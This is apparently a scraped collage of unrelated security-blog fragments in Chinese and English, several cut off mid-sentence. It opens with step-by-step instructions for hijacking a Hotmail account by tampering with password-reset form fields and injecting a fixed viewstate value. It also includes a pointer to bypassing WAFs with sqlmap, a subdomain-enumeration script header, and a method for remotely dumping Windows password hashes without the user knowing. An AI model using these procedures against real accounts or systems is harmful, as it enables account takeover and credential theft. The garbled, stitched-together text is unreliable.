1.) Hotmail :
Step 1. Go to this page https://maccount.live.com/ac/resetpwdmain.aspx .
Step 2. Enter the Target Email and enter the 6 characters you see.
Step 3. Start Tamper Data
Step 4. Delete Element "SendEmail_ContinueCmd"
Step 5. change Element "__V_previousForm" to "ResetOptionForm"
Step 6. Change Element "__viewstate" to "%2FwEXAQUDX19QDwUPTmV3UGFzc3dvcmRGb3JtZMw%2BEPFW%2Fak6gMIVsxSlDMZxkMkI"

What is this post?

Today we present a free plugin, developed by me, so you can use thesqlmap from BurpSuite so really comfortable.

Why this plugin?

Almost always we audit a website the first thing we usually do is put an intermediate proxy to have more control over what we send to it. For some reasons I use as a proxy BurpSuite.

http://websec.ca/blog/view/Bypassing_WAFs_with_SQLMap

一次讨论，讲到渗透，我提了一个核心的观点“威胁伴随企业成长”，意思是，当你的企业成长，系统更复杂，网络更庞大，应用更多时威胁其实也在一步步的成长，安全是一个整体的解决方案，不是卖了产品提供升级服务这么简单。如果在企业平静时，觉得自己权威有钱，卖的起设备，雇了高级管理员，觉得自己安全时候，这番话也就被列为散播威胁论了吧。

想到一个小故事

一村夫，种田辛苦半辈子盖了房子，房子落成那天，宴请村子里的邻里村民来庆祝。席间一个村民告诉他，我刚才看到你家厨房中堆放

https://h4cker.cn/pentest/82.html

[导读]近日，LulzSec和Anonymous频频出现于各大媒体版面中，同时诸多高盈利公司和政府机构网站遭到黑客攻击。然而，这并不能说明黑客攻击数量正在不断上升，实际上是黑客组织开始学会利用媒体进行炒作，制造了现实中并不存在的网络战争不断扩大的假象。

http://sec.chinabyte.com/95/12106595.shtml

记得有次做了一个模拟黑客攻击的演讲 在前期渗透部分 提到过几种收集二级域名的方法 

其中说道利用google寻找并整理二级域名列表的方法 目前有人开发了相应的工具 其实这种自动化收集信息的工具很多

而我喜欢脚本 是因为可以让自己不那么懒（方便自己扩展或删减功能）

不过当时也提到 这种方法 并不准确 会存在误差

#!/usr/bin/python -tt

# gxfr replicates dns zone transfers by enumerating subdomains using advanced search engine queries and conducting dns lookups.
# By T

感谢whois 感谢dig 感谢荤素包子!

While on a penetration test it is sometimes necessary to pull hash files from windows systems to crack weak passwords.  You could easily do this with a Metasploit meterpreter session, but sometimes I like to do it without exploiting the box.  Also doing it remotely over the network without a user’s knowledge is always a big plus.  This method isn’t always usable and available, but in the right situation we can use an NMAP script called pw-dump.nse to do this.

http://www.youtube.com/watch?v=AdIWl0gkynk&feature=player_detailpage

大家可以站在墙头观摩... 顺便注意下最后一秒！

1. Information Security Crime Investigator/Forensics Expert
2. System, Network, and/or Web Penetration Tester
3. Forensic Analyst
4. Incident Responder
5. Security Architect
6. Malware Analyst
7. Network Security Engineer
8. Security Analyst
9. Computer Crime Investigator
10. CISO/ISO or Director of Security
11. Application Penetration Tester
12. Security Operations Center Analyst
13. Prosecutor Spe

看官看图